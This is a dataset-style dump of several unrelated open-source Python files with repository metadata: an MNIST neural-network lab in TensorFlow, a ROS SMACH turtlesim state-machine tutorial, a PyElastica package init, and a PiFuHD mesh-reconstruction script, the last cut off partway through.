        if self.system is not None:
            self.header.append('metg')
        out = csv.DictWriter(sys.stdout, self.header, dialect=self.csv_dialect)
        out.writeheader()
        for nodes in sorted(self.table.keys()):
            row = self.table[nodes]
            # inf means "no data"; emit an empty cell instead.
            row = {k: None if v == float('inf') else v for k, v in row.items()}
            row['nodes'] = nodes
            if self.system is not None:
                row['metg'] = self.metg[nodes]
            out.writerow(row)
def driver(ngraphs, dependence, system, max_problem_size, min_problem_size, machine, resource, threshold, csv_dialect, verbose):
    """Construct a Parser for the requested data slice and run it over the machine's results."""
    parser = Parser(ngraphs, dependence, system, max_problem_size, min_problem_size, csv_dialect)
    parser.parse(machine, resource, threshold, False, verbose)
if __name__ == '__main__':
    # Command-line front end; every flag maps onto a driver() keyword argument.
    parser = argparse.ArgumentParser()
    parser.add_argument('-g', '--ngraphs', type=int, required=True)
    parser.add_argument('-d', '--dependence', required=True)
    parser.add_argument('-s', '--system')
    parser.add_argument('--max-problem-size')
    parser.add_argument('--min-problem-size')
    parser.add_argument('-m', '--machine', required=True)
    parser.add_argument('-r', '--resource', default='flops')
    parser.add_argument('-t', '--threshold', type=float, default=0.5)
    parser.add_argument('--csv-dialect', default='excel-tab')
    parser.add_argument('-v', '--verbose', action='store_true')
    args = parser.parse_args()
    driver(**vars(args))
| true | true |
f72ede905c2f5340f78dfcbe8efc10e27b0246a4 | 2,910 | py | Python | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 12 | 2018-03-07T00:44:56.000Z | 2019-01-25T11:07:43.000Z | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 3 | 2018-03-02T03:38:41.000Z | 2018-03-20T00:45:06.000Z | lab-10-2-mnist_nn.py | Garsiet/MchLE | 4afca0328a5710f16fa08f22b38431a6e84e6910 | [
"MIT"
] | 7 | 2018-03-02T07:14:53.000Z | 2019-01-04T08:06:47.000Z | # Lab 10 MNIST and NN
# Lab 10: MNIST classification with a 3-layer fully-connected ReLU network (TF1).
import tensorflow as tf
import random
# import matplotlib.pyplot as plt
from tensorflow.examples.tutorials.mnist import input_data
tf.set_random_seed(777)  # reproducibility
# Downloads MNIST on first use; labels are one-hot vectors of length 10.
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
# Check out https://www.tensorflow.org/get_started/mnist/beginners for
# more information about the mnist dataset
# hyperparameters
learning_rate = 0.001
training_epochs = 15
batch_size = 100
# input placeholders: 28x28 images flattened to 784 pixels, 10 digit classes
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, 10])
# weights & biases for the nn layers (784 -> 256 -> 256 -> 10)
W1 = tf.Variable(tf.random_normal([784, 256]))
b1 = tf.Variable(tf.random_normal([256]))
L1 = tf.nn.relu(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_normal([256, 256]))
b2 = tf.Variable(tf.random_normal([256]))
L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)
W3 = tf.Variable(tf.random_normal([256, 10]))
b3 = tf.Variable(tf.random_normal([10]))
# raw logits; the softmax is applied inside the loss op below
hypothesis = tf.matmul(L2, W3) + b3
# define cost/loss & optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
    logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
# initialize
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# train the model: one pass over the training set per epoch, in mini-batches
for epoch in range(training_epochs):
    avg_cost = 0
    total_batch = int(mnist.train.num_examples / batch_size)
    for i in range(total_batch):
        batch_xs, batch_ys = mnist.train.next_batch(batch_size)
        feed_dict = {X: batch_xs, Y: batch_ys}
        c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
        avg_cost += c / total_batch
    print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
# Test model and check accuracy on the held-out test set
correct_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
      X: mnist.test.images, Y: mnist.test.labels}))
# Pick one random test image and compare label vs. prediction
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
    tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
# plt.imshow(mnist.test.images[r:r + 1].
#            reshape(28, 28), cmap='Greys', interpolation='nearest')
# plt.show()
'''
Epoch: 0001 cost = 141.207671860
Epoch: 0002 cost = 38.788445864
Epoch: 0003 cost = 23.977515479
Epoch: 0004 cost = 16.315132428
Epoch: 0005 cost = 11.702554882
Epoch: 0006 cost = 8.573139748
Epoch: 0007 cost = 6.370995680
Epoch: 0008 cost = 4.537178684
Epoch: 0009 cost = 3.216900532
Epoch: 0010 cost = 2.329708954
Epoch: 0011 cost = 1.715552875
Epoch: 0012 cost = 1.189857912
Epoch: 0013 cost = 0.820965160
Epoch: 0014 cost = 0.624131458
Epoch: 0015 cost = 0.454633765
Learning Finished!
Accuracy: 0.9455
'''
| 30.631579 | 78 | 0.713746 |
# MNIST classification with a 3-layer fully-connected ReLU network (TF1).
import tensorflow as tf
import random
from tensorflow.examples.tutorials.mnist import input_data
# Fix the graph-level seed for reproducibility.
tf.set_random_seed(777)
# Downloads MNIST on first use; labels are one-hot vectors of length 10.
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
# hyperparameters
learning_rate = 0.001
training_epochs = 15
batch_size = 100
# input placeholders: 28x28 images flattened to 784 pixels, 10 digit classes
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, 10])
# weights & biases for the nn layers (784 -> 256 -> 256 -> 10)
W1 = tf.Variable(tf.random_normal([784, 256]))
b1 = tf.Variable(tf.random_normal([256]))
L1 = tf.nn.relu(tf.matmul(X, W1) + b1)
W2 = tf.Variable(tf.random_normal([256, 256]))
b2 = tf.Variable(tf.random_normal([256]))
L2 = tf.nn.relu(tf.matmul(L1, W2) + b2)
W3 = tf.Variable(tf.random_normal([256, 10]))
b3 = tf.Variable(tf.random_normal([10]))
# raw logits; the softmax is applied inside the loss op below
hypothesis = tf.matmul(L2, W3) + b3
# cost/loss & optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(
    logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
# train the model: one pass over the training set per epoch, in mini-batches
for epoch in range(training_epochs):
    avg_cost = 0
    total_batch = int(mnist.train.num_examples / batch_size)
    for i in range(total_batch):
        batch_xs, batch_ys = mnist.train.next_batch(batch_size)
        feed_dict = {X: batch_xs, Y: batch_ys}
        c, _ = sess.run([cost, optimizer], feed_dict=feed_dict)
        avg_cost += c / total_batch
    print('Epoch:', '%04d' % (epoch + 1), 'cost =', '{:.9f}'.format(avg_cost))
print('Learning Finished!')
# Evaluate accuracy on the held-out test set.
correct_prediction = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print('Accuracy:', sess.run(accuracy, feed_dict={
      X: mnist.test.images, Y: mnist.test.labels}))
# Pick one random test image and compare label vs. prediction.
r = random.randint(0, mnist.test.num_examples - 1)
print("Label: ", sess.run(tf.argmax(mnist.test.labels[r:r + 1], 1)))
print("Prediction: ", sess.run(
    tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r:r + 1]}))
| true | true |
f72edefdeaa956c002a8aa8310ace417a58e9aff | 5,653 | py | Python | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 3 | 2021-12-30T21:56:58.000Z | 2022-02-20T11:19:12.000Z | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 10 | 2021-11-13T21:18:33.000Z | 2022-03-11T23:11:23.000Z | Smach/executive_smach_tutorials/scripts/usecase_01/executive_step_06.py | OxRAMSociety/RobotArm | 8a402ac06e23b4447d59a0d1d0e3065da6a2591a | [
"MIT"
] | 2 | 2022-02-06T11:24:43.000Z | 2022-02-09T20:13:40.000Z | #!/usr/bin/env python3
"""
Description:
Usage:
$> roslaunch turtle_nodes.launch
$> ./executive_step_06.py
Output:
[INFO] : State machine starting in initial state 'RESET' with userdata:
[INFO] : State machine transitioning 'RESET':'succeeded'-->'SPAWN'
[INFO] : State machine transitioning 'SPAWN':'succeeded'-->'TELEPORT1'
[INFO] : State machine transitioning 'TELEPORT1':'succeeded'-->'TELEPORT2'
[INFO] : State machine transitioning 'TELEPORT2':'succeeded'-->'DRAW_SHAPES'
[INFO] : Concurrence starting with userdata:
[]
[INFO] : State machine starting in initial state 'DRAW_WITH_MONITOR' with userdata:
[]
[INFO] : Concurrence starting with userdata:
[]
[WARN] : Still waiting for action server 'turtle_shape1' to start... is it running?
[WARN] : Still waiting for action server 'turtle_shape2' to start... is it running?
[INFO] : Connected to action server 'turtle_shape2'.
[INFO] : Connected to action server 'turtle_shape1'.
[INFO] : Preempt requested on action 'turtle_shape2'
[INFO] : Preempt on action 'turtle_shape2' cancelling goal:
edges: 6
radius: 0.5
[INFO] : Concurrent Outcomes: {'MONITOR': 'invalid', 'DRAW': 'preempted'}
[INFO] : State machine transitioning 'DRAW_WITH_MONITOR':'interrupted'-->'WAIT_FOR_CLEAR'
[INFO] : State machine transitioning 'WAIT_FOR_CLEAR':'invalid'-->'DRAW_WITH_MONITOR'
[INFO] : Concurrence starting with userdata:
[]
[INFO] : Concurrent Outcomes: {'MONITOR': 'preempted', 'DRAW': 'succeeded'}
[INFO] : State machine terminating 'DRAW_WITH_MONITOR':'succeeded':'succeeded'
[INFO] : Concurrent Outcomes: {'SMALL': 'succeeded', 'BIG': 'succeeded'}
[INFO] : State machine terminating 'DRAW_SHAPES':'succeeded':'succeeded'
"""
import rospy
import threading
from math import sqrt, pow
import smach
from smach import StateMachine, ServiceState, SimpleActionState, MonitorState, IntrospectionServer, Concurrence
import std_srvs.srv
import turtlesim.srv
import turtlesim.msg
import turtle_actionlib.msg
def main():
    """Build and run the SMACH use-case state machine on two turtlesim turtles.

    Resets the simulator, spawns/teleports two turtles, then draws two polygons
    concurrently; the small polygon is drawn under a monitor that aborts when
    turtle1 wanders near (9, 5).
    """
    rospy.init_node('smach_usecase_step_06')
    # Construct static action goals for the two polygons
    polygon_big = turtle_actionlib.msg.ShapeGoal(edges = 11, radius = 4.0)
    polygon_small = turtle_actionlib.msg.ShapeGoal(edges = 6, radius = 0.5)
    # Create the top-level SMACH state machine
    sm0 = StateMachine(outcomes=['succeeded','aborted','preempted'])
    # Open the container
    with sm0:
        # Reset turtlesim
        StateMachine.add('RESET',
                ServiceState('reset', std_srvs.srv.Empty),
                {'succeeded':'SPAWN'})
        # Create a second turtle
        StateMachine.add('SPAWN',
                ServiceState('spawn', turtlesim.srv.Spawn,
                    request = turtlesim.srv.SpawnRequest(0.0,0.0,0.0,'turtle2')),
                {'succeeded':'TELEPORT1'})
        # Teleport turtle 1
        StateMachine.add('TELEPORT1',
                ServiceState('turtle1/teleport_absolute', turtlesim.srv.TeleportAbsolute,
                    request = turtlesim.srv.TeleportAbsoluteRequest(5.0,1.0,0.0)),
                {'succeeded':'TELEPORT2'})
        # Teleport turtle 2
        StateMachine.add('TELEPORT2',
                ServiceState('turtle2/teleport_absolute', turtlesim.srv.TeleportAbsolute,
                    request = turtlesim.srv.TeleportAbsoluteRequest(9.0,5.0,0.0)),
                {'succeeded':'DRAW_SHAPES'})
        # Draw both polygons concurrently; succeed only if both succeed
        shapes_cc = Concurrence(
                outcomes=['succeeded','aborted','preempted'],
                default_outcome='aborted',
                outcome_map = {'succeeded':{'BIG':'succeeded','SMALL':'succeeded'}})
        StateMachine.add('DRAW_SHAPES',shapes_cc)
        with shapes_cc:
            # Draw a large polygon with the first turtle
            Concurrence.add('BIG',
                    SimpleActionState('turtle_shape1',turtle_actionlib.msg.ShapeAction,
                        goal = polygon_big))
            # Draw a small polygon with the second turtle, guarded by a monitor;
            # the first child to finish terminates the other (child_termination_cb)
            draw_monitor_cc = Concurrence(
                    ['succeeded','aborted','preempted'],
                    'aborted',
                    child_termination_cb = lambda so: True,
                    outcome_map = {
                        'succeeded':{'DRAW':'succeeded'},
                        'preempted':{'DRAW':'preempted','MONITOR':'preempted'},
                        'aborted':{'MONITOR':'invalid'}})
            Concurrence.add('SMALL',draw_monitor_cc)
            with draw_monitor_cc:
                Concurrence.add('DRAW',
                        SimpleActionState('turtle_shape2',turtle_actionlib.msg.ShapeAction,
                            goal = polygon_small))
                def turtle_far_away(ud, msg):
                    """Return True while the turtle pose in msg is more than 2 units from (9, 5)."""
                    if sqrt(pow(msg.x-9.0,2) + pow(msg.y-5.0,2)) > 2.0:
                        return True
                    return False
                Concurrence.add('MONITOR',
                        MonitorState('/turtle1/pose',turtlesim.msg.Pose,
                            cond_cb = turtle_far_away))
    # Attach a SMACH introspection server (for smach_viewer)
    sis = IntrospectionServer('smach_usecase_01', sm0, '/USE_CASE')
    sis.start()
    # Set preempt handler so ctrl-c preempts the tree cleanly
    smach.set_preempt_handler(sm0)
    # Execute SMACH tree in a separate thread so that we can ctrl-c the script
    smach_thread = threading.Thread(target = sm0.execute)
    smach_thread.start()
    # Keep the node alive until shutdown
    rospy.spin()
if __name__ == '__main__':
    main()
| 39.809859 | 111 | 0.61401 |
import rospy
import threading
from math import sqrt, pow
import smach
from smach import StateMachine, ServiceState, SimpleActionState, MonitorState, IntrospectionServer, Concurrence
import std_srvs.srv
import turtlesim.srv
import turtlesim.msg
import turtle_actionlib.msg
def main():
    """Build and run the SMACH use-case state machine on two turtlesim turtles.

    Resets the simulator, spawns/teleports two turtles, then draws two polygons
    concurrently; the small polygon is drawn under a monitor that aborts when
    turtle1 wanders near (9, 5).
    """
    rospy.init_node('smach_usecase_step_06')
    # Static action goals for the two polygons
    polygon_big = turtle_actionlib.msg.ShapeGoal(edges = 11, radius = 4.0)
    polygon_small = turtle_actionlib.msg.ShapeGoal(edges = 6, radius = 0.5)
    # Top-level SMACH state machine
    sm0 = StateMachine(outcomes=['succeeded','aborted','preempted'])
    with sm0:
        # Reset turtlesim
        StateMachine.add('RESET',
                ServiceState('reset', std_srvs.srv.Empty),
                {'succeeded':'SPAWN'})
        # Create a second turtle
        StateMachine.add('SPAWN',
                ServiceState('spawn', turtlesim.srv.Spawn,
                    request = turtlesim.srv.SpawnRequest(0.0,0.0,0.0,'turtle2')),
                {'succeeded':'TELEPORT1'})
        # Teleport turtle 1
        StateMachine.add('TELEPORT1',
                ServiceState('turtle1/teleport_absolute', turtlesim.srv.TeleportAbsolute,
                    request = turtlesim.srv.TeleportAbsoluteRequest(5.0,1.0,0.0)),
                {'succeeded':'TELEPORT2'})
        # Teleport turtle 2
        StateMachine.add('TELEPORT2',
                ServiceState('turtle2/teleport_absolute', turtlesim.srv.TeleportAbsolute,
                    request = turtlesim.srv.TeleportAbsoluteRequest(9.0,5.0,0.0)),
                {'succeeded':'DRAW_SHAPES'})
        # Draw both polygons concurrently; succeed only if both succeed
        shapes_cc = Concurrence(
                outcomes=['succeeded','aborted','preempted'],
                default_outcome='aborted',
                outcome_map = {'succeeded':{'BIG':'succeeded','SMALL':'succeeded'}})
        StateMachine.add('DRAW_SHAPES',shapes_cc)
        with shapes_cc:
            # Large polygon with the first turtle
            Concurrence.add('BIG',
                    SimpleActionState('turtle_shape1',turtle_actionlib.msg.ShapeAction,
                        goal = polygon_big))
            # Small polygon guarded by a monitor; the first child to finish
            # terminates the other (child_termination_cb always returns True)
            draw_monitor_cc = Concurrence(
                    ['succeeded','aborted','preempted'],
                    'aborted',
                    child_termination_cb = lambda so: True,
                    outcome_map = {
                        'succeeded':{'DRAW':'succeeded'},
                        'preempted':{'DRAW':'preempted','MONITOR':'preempted'},
                        'aborted':{'MONITOR':'invalid'}})
            Concurrence.add('SMALL',draw_monitor_cc)
            with draw_monitor_cc:
                Concurrence.add('DRAW',
                        SimpleActionState('turtle_shape2',turtle_actionlib.msg.ShapeAction,
                            goal = polygon_small))
                def turtle_far_away(ud, msg):
                    """Return True while the turtle pose in msg is more than 2 units from (9, 5)."""
                    if sqrt(pow(msg.x-9.0,2) + pow(msg.y-5.0,2)) > 2.0:
                        return True
                    return False
                Concurrence.add('MONITOR',
                        MonitorState('/turtle1/pose',turtlesim.msg.Pose,
                            cond_cb = turtle_far_away))
    # Attach a SMACH introspection server (for smach_viewer)
    sis = IntrospectionServer('smach_usecase_01', sm0, '/USE_CASE')
    sis.start()
    # Preempt handler so ctrl-c preempts the tree cleanly
    smach.set_preempt_handler(sm0)
    # Execute the SMACH tree in a separate thread so we can ctrl-c the script
    smach_thread = threading.Thread(target = sm0.execute)
    smach_thread.start()
    rospy.spin()
if __name__ == '__main__':
    main()
| true | true |
f72edff35f01d27c9da2c2eae2c4065b8bc7ba12 | 146 | py | Python | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 71 | 2020-04-15T17:02:42.000Z | 2022-03-26T04:53:51.000Z | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 59 | 2020-05-15T03:51:46.000Z | 2022-03-28T13:53:01.000Z | elastica/rigidbody/__init__.py | yeonsu-jung/PyElastica | fee87b9da22e310ff925c16fdc839bf8405c51a4 | [
"MIT"
] | 57 | 2020-06-17T20:34:02.000Z | 2022-03-16T08:09:54.000Z | __all__ = ["RigidBodyBase", "Cylinder", "Sphere"]
from .rigid_body import RigidBodyBase
from .cylinder import Cylinder
from .sphere import Sphere
| 29.2 | 49 | 0.787671 | __all__ = ["RigidBodyBase", "Cylinder", "Sphere"]
from .rigid_body import RigidBodyBase
from .cylinder import Cylinder
from .sphere import Sphere
| true | true |
f72ee0a79d6772df7fd35864b092bd02cfb99099 | 8,117 | py | Python | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | apps/recon.py | bell-one/pifuhd | 3221d266a042ad58de702e65e588ada5426b08f6 | [
"MIT"
] | null | null | null | # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
import time
import json
import numpy as np
import cv2
import random
import torch
import torch.nn as nn
from tqdm import tqdm
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib
from numpy.linalg import inv
from lib.options import BaseOptions
from lib.mesh_util import save_obj_mesh_with_color, reconstruction
from lib.data import EvalWPoseDataset, EvalDataset
from lib.model import HGPIFuNetwNML, HGPIFuMRNet
from lib.geometry import index
from PIL import Image
parser = BaseOptions()
def gen_mesh(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
    """Reconstruct a mesh for one sample and save it colored by predicted normals.

    Args:
        res: marching-cubes resolution passed to reconstruction().
        net: model exposing filter_global/filter_local/calc_normal (HGPIFuMRNet-style).
        cuda: torch device the model lives on.
        data: sample dict with 'img_512', 'img', 'calib', 'b_min', 'b_max'.
        save_path: output .obj path; a .png input preview is written next to it.
        thresh: iso-surface threshold.
        use_octree: use octree-accelerated evaluation.
        components: unused; kept for interface compatibility.
    """
    image_tensor_global = data['img_512'].to(device=cuda)
    image_tensor = data['img'].to(device=cuda)
    calib_tensor = data['calib'].to(device=cuda)
    net.filter_global(image_tensor_global)
    net.filter_local(image_tensor[:,None])
    # If the global branch predicted front/back normal maps, stack them into
    # the preview image. Not every checkpoint has netF/netB, hence the guard.
    try:
        if net.netG.netF is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
        if net.netG.netB is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
    except:
        pass
    b_min = data['b_min']
    b_max = data['b_max']
    try:
        # Save a side-by-side preview of the (denormalized, BGR) network inputs.
        save_img_path = save_path[:-4] + '.png'
        save_img_list = []
        for v in range(image_tensor_global.shape[0]):
            save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
            save_img_list.append(save_img)
        save_img = np.concatenate(save_img_list, axis=1)
        cv2.imwrite(save_img_path, save_img)
        verts, faces, _, _ = reconstruction(
            net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=50000)
        verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
        # Color each vertex by its predicted normal, in chunks to bound memory.
        color = np.zeros(verts.shape)
        interval = 50000
        for left in range(0, len(color), interval):
            # Bug fix: the last chunk used to set `right = -1`, and slicing with
            # [left:-1] silently dropped the final vertex from both calc_normal
            # and the color assignment. Clamp to len(color) instead.
            right = min(left + interval, len(color))
            net.calc_normal(verts_tensor[:, None, :, left:right], calib_tensor[:,None], calib_tensor)
            nml = net.nmls.detach().cpu().numpy()[0] * 0.5 + 0.5
            color[left:right] = nml.T
        save_obj_mesh_with_color(save_path, verts, faces, color)
    except Exception as e:
        # Best-effort: reconstruction failures are reported but do not abort the run.
        print(e)
def gen_mesh_imgColor(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
    """Reconstruct a mesh for one sample and save it colored from the input image.

    Unlike gen_mesh, vertex colors are sampled from the input photograph by
    projecting each vertex into the image, rather than from predicted normals.
    """
    img_global = data['img_512'].to(device=cuda)
    img_local = data['img'].to(device=cuda)
    calib = data['calib'].to(device=cuda)
    net.filter_global(img_global)
    net.filter_local(img_local[:, None])
    # Stack predicted front/back normal maps onto the preview, when available.
    try:
        if net.netG.netF is not None:
            img_global = torch.cat([img_global, net.netG.nmlF], 0)
        if net.netG.netB is not None:
            img_global = torch.cat([img_global, net.netG.nmlB], 0)
    except:
        pass
    b_min = data['b_min']
    b_max = data['b_max']
    try:
        # Preview image: denormalize each channel stack (to BGR, 0-255) and
        # lay the panels side by side.
        panels = [
            (np.transpose(img_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
            for v in range(img_global.shape[0])
        ]
        cv2.imwrite(save_path[:-4] + '.png', np.concatenate(panels, axis=1))
        verts, faces, _, _ = reconstruction(
            net, cuda, calib, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=100000)
        verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
        # Project vertices into the image and sample their colors.
        # (If this raises, projection must be defined somewhere else.)
        uv = net.projection(verts_tensor, calib[:1])[:, :2, :]
        color = index(img_local[:1], uv).detach().cpu().numpy()[0].T
        color = color * 0.5 + 0.5
        # Optionally move the mesh back into world coordinates.
        if 'calib_world' in data:
            calib_world = data['calib_world'].numpy()[0]
            homogeneous = np.concatenate([verts, np.ones_like(verts[:, :1])], 1)
            verts = np.matmul(homogeneous, inv(calib_world).T)[:, :3]
        save_obj_mesh_with_color(save_path, verts, faces, color)
    except Exception as e:
        # Best-effort: reconstruction failures are reported but do not abort the run.
        print(e)
def recon(opt, use_rect=False):
    """Load the checkpointed model and reconstruct a mesh for every test sample.

    Args:
        opt: parsed BaseOptions. Mostly overwritten by the options stored in
            the checkpoint; dataroot/resolution/results_path/loadSize are kept
            from the caller.
        use_rect: if True, use the bounding-box dataset (EvalDataset) instead
            of the pose-based one (EvalWPoseDataset).

    Raises:
        Exception: if no checkpoint file could be located.
    """
    # load checkpoints: explicit path, latest, or a specific resume epoch
    state_dict_path = None
    if opt.load_netMR_checkpoint_path is not None:
        state_dict_path = opt.load_netMR_checkpoint_path
    elif opt.resume_epoch < 0:
        state_dict_path = '%s/%s_train_latest' % (opt.checkpoints_path, opt.name)
        opt.resume_epoch = 0
    else:
        state_dict_path = '%s/%s_train_epoch_%d' % (opt.checkpoints_path, opt.name, opt.resume_epoch)
    start_id = opt.start_id
    end_id = opt.end_id
    cuda = torch.device('cuda:%d' % opt.gpu_id if torch.cuda.is_available() else 'cpu')
    state_dict = None
    if state_dict_path is not None and os.path.exists(state_dict_path):
        print('Resuming from ', state_dict_path)
        state_dict = torch.load(state_dict_path, map_location=cuda)
        print('Warning: opt is overwritten.')
        # Keep the caller's data/output settings; take everything else from
        # the options saved alongside the checkpoint.
        dataroot = opt.dataroot
        resolution = opt.resolution
        results_path = opt.results_path
        loadSize = opt.loadSize
        opt = state_dict['opt']
        opt.dataroot = dataroot
        opt.resolution = resolution
        opt.results_path = results_path
        opt.loadSize = loadSize
    else:
        raise Exception('failed loading state dict!', state_dict_path)
    # parser.print_options(opt)
    if use_rect:
        test_dataset = EvalDataset(opt)
    else:
        test_dataset = EvalWPoseDataset(opt)
    print('test data size: ', len(test_dataset))
    projection_mode = test_dataset.projection_mode
    # Rebuild the coarse network and the multi-resolution wrapper around it.
    opt_netG = state_dict['opt_netG']
    netG = HGPIFuNetwNML(opt_netG, projection_mode).to(device=cuda)
    netMR = HGPIFuMRNet(opt, netG, projection_mode).to(device=cuda)
    def set_eval():
        netG.eval()
    # load checkpoints
    netMR.load_state_dict(state_dict['model_state_dict'])
    os.makedirs(opt.checkpoints_path, exist_ok=True)
    os.makedirs(opt.results_path, exist_ok=True)
    os.makedirs('%s/%s/recon' % (opt.results_path, opt.name), exist_ok=True)
    # Negative ids mean "from the beginning" / "to the end" of the dataset.
    if start_id < 0:
        start_id = 0
    if end_id < 0:
        end_id = len(test_dataset)
    ## test: reconstruct each requested sample without gradients
    with torch.no_grad():
        set_eval()
        print('generate mesh (test) ...')
        for i in tqdm(range(start_id, end_id)):
            if i >= len(test_dataset):
                break
            # for multi-person processing, set it to False
            if True:
                test_data = test_dataset[i]
                save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], opt.resolution)
                print(save_path)
                gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
            else:
                for j in range(test_dataset.get_n_person(i)):
                    test_dataset.person_id = j
                    test_data = test_dataset[i]
                    save_path = '%s/%s/recon/result_%s_%d.obj' % (opt.results_path, opt.name, test_data['name'], j)
                    gen_mesh_imgColor(opt.resolution, netMR, cuda, test_data, save_path, components=opt.use_compose)
def reconWrapper(args=None, use_rect=False):
    """Parse command-line options (argv list, or None for sys.argv) and run recon()."""
    recon(parser.parse(args), use_rect)
if __name__ == '__main__':
    reconWrapper()
| 36.075556 | 127 | 0.637797 |
import sys
import os
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
import time
import json
import numpy as np
import cv2
import random
import torch
import torch.nn as nn
from tqdm import tqdm
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib
from numpy.linalg import inv
from lib.options import BaseOptions
from lib.mesh_util import save_obj_mesh_with_color, reconstruction
from lib.data import EvalWPoseDataset, EvalDataset
from lib.model import HGPIFuNetwNML, HGPIFuMRNet
from lib.geometry import index
from PIL import Image
parser = BaseOptions()
def gen_mesh(res, net, cuda, data, save_path, thresh=0.5, use_octree=True, components=False):
    """Reconstruct a mesh for one sample and save it colored by predicted normals.

    Args:
        res: marching-cubes resolution passed to reconstruction().
        net: model exposing filter_global/filter_local/calc_normal (HGPIFuMRNet-style).
        cuda: torch device the model lives on.
        data: sample dict with 'img_512', 'img', 'calib', 'b_min', 'b_max'.
        save_path: output .obj path; a .png input preview is written next to it.
        thresh: iso-surface threshold.
        use_octree: use octree-accelerated evaluation.
        components: unused; kept for interface compatibility.
    """
    image_tensor_global = data['img_512'].to(device=cuda)
    image_tensor = data['img'].to(device=cuda)
    calib_tensor = data['calib'].to(device=cuda)
    net.filter_global(image_tensor_global)
    net.filter_local(image_tensor[:,None])
    # If the global branch predicted front/back normal maps, stack them into
    # the preview image. Not every checkpoint has netF/netB, hence the guard.
    try:
        if net.netG.netF is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlF], 0)
        if net.netG.netB is not None:
            image_tensor_global = torch.cat([image_tensor_global, net.netG.nmlB], 0)
    except:
        pass
    b_min = data['b_min']
    b_max = data['b_max']
    try:
        # Save a side-by-side preview of the (denormalized, BGR) network inputs.
        save_img_path = save_path[:-4] + '.png'
        save_img_list = []
        for v in range(image_tensor_global.shape[0]):
            save_img = (np.transpose(image_tensor_global[v].detach().cpu().numpy(), (1, 2, 0)) * 0.5 + 0.5)[:, :, ::-1] * 255.0
            save_img_list.append(save_img)
        save_img = np.concatenate(save_img_list, axis=1)
        cv2.imwrite(save_img_path, save_img)
        verts, faces, _, _ = reconstruction(
            net, cuda, calib_tensor, res, b_min, b_max, thresh, use_octree=use_octree, num_samples=50000)
        verts_tensor = torch.from_numpy(verts.T).unsqueeze(0).to(device=cuda).float()
        # Color each vertex by its predicted normal, in chunks to bound memory.
        color = np.zeros(verts.shape)
        interval = 50000
        for left in range(0, len(color), interval):
            # Bug fix: the last chunk used to set `right = -1`, and slicing with
